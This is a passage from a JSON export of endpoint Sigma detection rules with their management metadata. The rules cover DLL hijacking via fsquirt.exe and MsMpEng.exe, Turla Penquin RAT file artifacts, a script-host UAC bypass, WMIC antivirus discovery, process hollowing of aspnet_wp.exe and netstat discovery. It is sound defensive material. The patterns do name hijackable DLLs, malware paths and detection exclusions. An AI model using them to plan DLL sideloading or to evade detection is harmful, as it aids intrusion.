],
"rule_technique_tags": [
"attack.t1202",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c84803e-609a-4dfe-8406-a744c8d5ce88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098165Z",
"creation_date": "2026-03-23T11:45:34.098167Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098171Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fsquirt.yml",
"content": "title: DLL Hijacking via fsquirt.exe\nid: 3c84803e-609a-4dfe-8406-a744c8d5ce88\ndescription: |\n Detects potential Windows DLL Hijacking via fsquirt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fsquirt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\dwmapi.dll'\n - '\\mswsock.dll'\n - '\\OLEACC.dll'\n - '\\powrprof.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c84803e-609a-4dfe-8406-a744c8d5ce88",
"rule_name": "DLL Hijacking via fsquirt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fsquirt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3cb2591b-d815-4683-980f-4d8f4073576a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098712Z",
"creation_date": "2026-03-23T11:45:34.098714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading/",
"https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/",
"https://www.fortinet.com/blog/threat-research/dll-side-loading-technique-used-in-recent-kaseya-ransomware-attack",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msmpeng.yml",
"content": "title: DLL Hijacking via MsMpEng.exe\nid: 3cb2591b-d815-4683-980f-4d8f4073576a\ndescription: |\n Detects potential Windows DLL Hijacking via MsMpEng.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading/\n - https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/\n - https://www.fortinet.com/blog/threat-research/dll-side-loading-technique-used-in-recent-kaseya-ransomware-attack\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\mpsvc.dll'\n - '\\vftrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3cb2591b-d815-4683-980f-4d8f4073576a",
"rule_name": "DLL Hijacking via MsMpEng.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MsMpEng.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3cbf8724-1817-4afc-88cf-2dc0f1eb9faa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088359Z",
"creation_date": "2026-03-23T11:45:34.088362Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088366Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/tactics/TA0002/",
"https://attack.mitre.org/groups/G0010/",
"https://attack.mitre.org/software/S0587/"
],
"name": "t1105_penquin_turla_suspicious_file_creation.yml",
"content": "title: Suspicious File Creation Related to Penquin\nid: 3cbf8724-1817-4afc-88cf-2dc0f1eb9faa\ndescription: |\n Detects the creation of files with names linked to the malware Penquin.\n Penquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\n Those names are related to files that are downloaded from the C&C server to be executed.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/tactics/TA0002/\n - https://attack.mitre.org/groups/G0010/\n - https://attack.mitre.org/software/S0587/\ndate: 2023/01/11\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.command_and_control\n - attack.t1105\n - attack.g0010\n - attack.s0587\n - classification.Linux.Source.Filesystem\n - classification.Linux.Malware.Penquin\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/tmp/.xdfg' # Penquin, Penquin_2.0\n - '/root/.session' # Penquin_x64\n - '/root/.hsperfdata' # Penquin_x64\n - '/tmp/.sync.pid' # Penquin_x64\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3cbf8724-1817-4afc-88cf-2dc0f1eb9faa",
"rule_name": "Suspicious File Creation Related to Penquin",
"rule_description": "Detects the creation of files with names linked to the malware Penquin.\nPenquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\nThose names are related to files that are downloaded from the C&C server to be executed.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2023-01-11",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d365b91-4487-438a-badb-29c05c867216",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074427Z",
"creation_date": "2026-03-23T11:45:34.074429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074434Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20150908225350/https://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_script_engine.yml",
"content": "title: WScript/CScript UAC Bypass Prepared\nid: 3d365b91-4487-438a-badb-29c05c867216\ndescription: |\n Detects the preparation of a UAC bypass via wscript.exe or cscript.exe via the creation of a XScript.manifest file.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the filesystem change to look for malicious content or actions.\nreferences:\n - https://web.archive.org/web/20150908225350/https://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/26\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1059.005\n - attack.t1059.007\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\wscript.exe.manifest'\n - '\\cscript.exe.manifest'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d365b91-4487-438a-badb-29c05c867216",
"rule_name": "WScript/CScript UAC Bypass Prepared",
"rule_description": "Detects the preparation of a UAC bypass via wscript.exe or cscript.exe via the creation of a XScript.manifest file.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the filesystem change to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1059.007",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d4e7e23-3983-42cc-a582-3c2daece8466",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622543Z",
"creation_date": "2026-03-23T11:45:34.622545Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622549Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic",
"https://attack.mitre.org/techniques/T1518/001/"
],
"name": "t1518_001_security_software_discovery.yml",
"content": "title: Security Software Product Discovered via WMIC\nid: 3d4e7e23-3983-42cc-a582-3c2daece8466\ndescription: |\n Detects the discovery of the main security software product using WMIC.\n Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\n It is recommended to analyze WMIC's parent process to look for malicious content or other malicious actions.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1518/001/\ndate: 2021/04/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1518.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct\n selection_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n selection_2:\n - CommandLine|contains|all:\n - '/Namespace'\n - 'SecurityCenter'\n - 'Path'\n - 'AntiVirusProduct'\n\n # Some uninstall/install scripts check for a single instance of a\n # security product.\n exclusion_specific_instanceguid:\n CommandLine|contains: 'instanceGuid=*{????????-????-????-????-????????????}'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_jetbrains:\n CommandLine:\n - 'wmic /Namespace:\\\\root\\SecurityCenter2 Path AntivirusProduct Get displayName,productState' # old agent\n - 'wmic /Namespace:\\\\\\\\root\\SecurityCenter2 Path AntivirusProduct Get displayName,productState' # new agent\n # C:\\Program Files\\JetBrains\\IntelliJ IDEA 2020.3.1\\bin\\idea64.exe\n # C:\\Program Files\\JetBrains\\PyCharm Community Edition 2021.1.1\\bin\\pycharm64.exe\n # C:\\Program Files\\JetBrains\\WebStorm 2021.2.1\\bin\\webstorm64.exe\n # C:\\Program Files\\JetBrains\\DataGrip 2021.2\\bin\\datagrip64.exe\n # C:\\Program Files\\JetBrains\\PhpStorm 2020.3.3\\bin\\phpstorm64.exe\n ParentImage|endswith:\n - '\\bin\\idea64.exe'\n - '\\bin\\pycharm64.exe'\n - '\\bin\\webstorm64.exe'\n - '\\bin\\datagrip64.exe'\n - '\\bin\\phpstorm64.exe'\n - '\\bin\\rider64.exe'\n\n exclusion_sophos:\n ParentImage: '?:\\Program Files (x86)\\Sophos\\Sophos Diagnostic Utility\\sdugui.exe'\n\n exclusion_meshagent:\n ParentImage: '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n CommandLine: 'wmic /Namespace:\\\\\\\\root\\SecurityCenter2 Path AntiVirusProduct get /FORMAT:CSV'\n\n exclusion_trendmicro:\n ParentImage|endswith: '\\SCUT.exe'\n ProcessParentSignature: 'Trend Micro, Inc.'\n\n exclusion_fsecure:\n ProcessParentImage:\n - '?:\\Program Files\\f-secure\\server security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files (x86)\\f-secure\\server security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files\\f-secure\\psb\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files (x86)\\f-secure\\psb\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files\\f-secure\\client security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files (x86)\\f-secure\\client security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files\\Withsecure\\policy manager\\diagnostics\\wsdiag.exe'\n - '?:\\Program Files (x86)\\Withsecure\\policy manager\\diagnostics\\wsdiag.exe'\n\n # https://rmm.datto.com/help/en/Content/5AGENT/Agent.htm\n exclusion_datto:\n GrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n\n exclusion_intellij:\n ParentImage|endswith: '\\intelliJ\\app\\jbr\\bin\\java.exe'\n ParentCommandLine|contains: '\\intelliJ\\app\\lib\\extensions.jar'\n\n exclusion_intunes:\n Ancestors|contains:\n - '?:\\Program Files\\Microsoft Intune Management Extension\\'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\'\n\n exclusion_simplehelp:\n ParentImage: '?:\\ProgramData\\JWrapper-Remote Access\\JWrapper-Windows*\\bin\\Remote Access.exe'\n\n exclusion_papercut:\n ParentCommandLine|contains: '/value > ?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*.tmp\\antivirus-info.log 2>&1'\n GrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*.tmp\\papercut-hive.tmp'\n\n exclusion_dataspell:\n ParentImage|endswith: '\\bin\\dataspell64.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'JetBrains s.r.o.'\n\n exclusion_screenbeam:\n GrandparentImage: '?:\\Program Files\\ScreenBeam\\Conference\\app\\SBConfDiag.exe'\n\n exclusion_eclipse:\n ParentImage|endswith: '\\eclipse\\eclipse.exe'\n ProcessParentSigned: 'true'\n ProcessParentSignature: 'Eclipse.org Foundation, Inc.'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d4e7e23-3983-42cc-a582-3c2daece8466",
"rule_name": "Security Software Product Discovered via WMIC",
"rule_description": "Detects the discovery of the main security software product using WMIC.\nAdversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\nIt is recommended to analyze WMIC's parent process to look for malicious content or other malicious actions.\n",
"rule_creation_date": "2021-04-02",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1518.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d5a0c6d-0a15-4c37-83e0-d6c7548133f5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.615384Z",
"creation_date": "2026-03-23T11:45:34.615387Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.615394Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_aspnet_wp.yml",
"content": "title: Aspnet_wp.exe Sacrificial Process Spawned\nid: 3d5a0c6d-0a15-4c37-83e0-d6c7548133f5\ndescription: |\n Detects the suspicious execution of the legitimate Windows binary aspnet_wp.exe, spawned without arguments and in an abnormal execution context.\n This can mean that the binary is being used as sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by, for instance, by the Vidar malware.\n It is recommended to investigate the parent process performing this action and the destination IP address of the aspnet_wp.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/05/13\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\Microsoft.NET\\Framework\\v*\\aspnet_wp.exe'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d5a0c6d-0a15-4c37-83e0-d6c7548133f5",
"rule_name": "Aspnet_wp.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate Windows binary aspnet_wp.exe, spawned without arguments and in an abnormal execution context.\nThis can mean that the binary is being used as sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by, for instance, by the Vidar malware.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the aspnet_wp.exe process to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-02-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d99b108-5ade-42df-b9d6-c4b94dea6e12",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294466Z",
"creation_date": "2026-03-23T11:45:35.294469Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294476Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1049/",
"https://attack.mitre.org/software/S0104/"
],
"name": "t1049_netstat_macos.yml",
"content": "title: Network Statistics Discovered via Netstat (macOS)\nid: 3d99b108-5ade-42df-b9d6-c4b94dea6e12\ndescription: |\n Detects the execution of the netstat command.\n Attackers may use it during the discovery phase of an attack to retrieve network connection statistics and gather information on currently active connections.\n It is recommended to check for other suspicious activities by the parent process and to correlate this alert with any other discovery activity to determine legitimacy.\n If this activity is recurrent in your environment and legitimate, it is highly recommended to whitelist it.\nreferences:\n - https://attack.mitre.org/techniques/T1049/\n - https://attack.mitre.org/software/S0104/\ndate: 2022/11/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1049\n - attack.s0104\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/netstat'\n CommandLine:\n - 'netstat'\n - 'netstat -?'\n - 'netstat -??'\n - 'netstat -???'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_common_folder:\n - ProcessParentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n - ProcessParentCommandLine|startswith:\n - 'bash /Applications/*/Contents/Resources/'\n - 'bash /Applications/*/Contents/MacOS/'\n - ProcessGrandparentImage|startswith:\n - '/Applications/*/Contents/Resources/'\n - '/Applications/*/Contents/MacOS/'\n - '/Library/Application Support/'\n - '/opt/homebrew/'\n - '/Library/PrivilegedHelperTools/'\n\n exclusion_parent:\n - ParentImage:\n - '/Library/Application Support/LANDesk/bin/ivCSEP'\n - '/usr/libexec/wifivelocityd'\n - '/Applications/rekordbox*/rekordbox.app/Contents/MacOS/rekordbox'\n - '/usr/local/bin/node'\n - '/Users/*/.nvm/versions/node/v*/bin/node'\n - '/Users/*/.asdf/installs/nodejs/*/bin/node'\n - '/Users/*/.local/share/fnm/node-versions/v*/installation/bin/node'\n - '/Applications/eul.app/Contents/MacOS/eul'\n - '/Applications/AnyDesk.app/Contents/MacOS/AnyDesk'\n - '/Library/Application Support/LANDesk/bin/ldiscan'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Applications/Ivanti Secure Access.app/Contents/Plugins/JUNS/dsAccessService'\n - '/Library/SystemExtensions/????????-????-????-????-????????????/io.tailscale.ipn.macsys.network-extension.systemextension/Contents/MacOS/io.tailscale.ipn.macsys.network-extension'\n - '/Applications/Tailscale.app/Contents/PlugIns/IPNExtension.appex/Contents/MacOS/IPNExtension'\n - ParentCommandLine: '/bin/sh 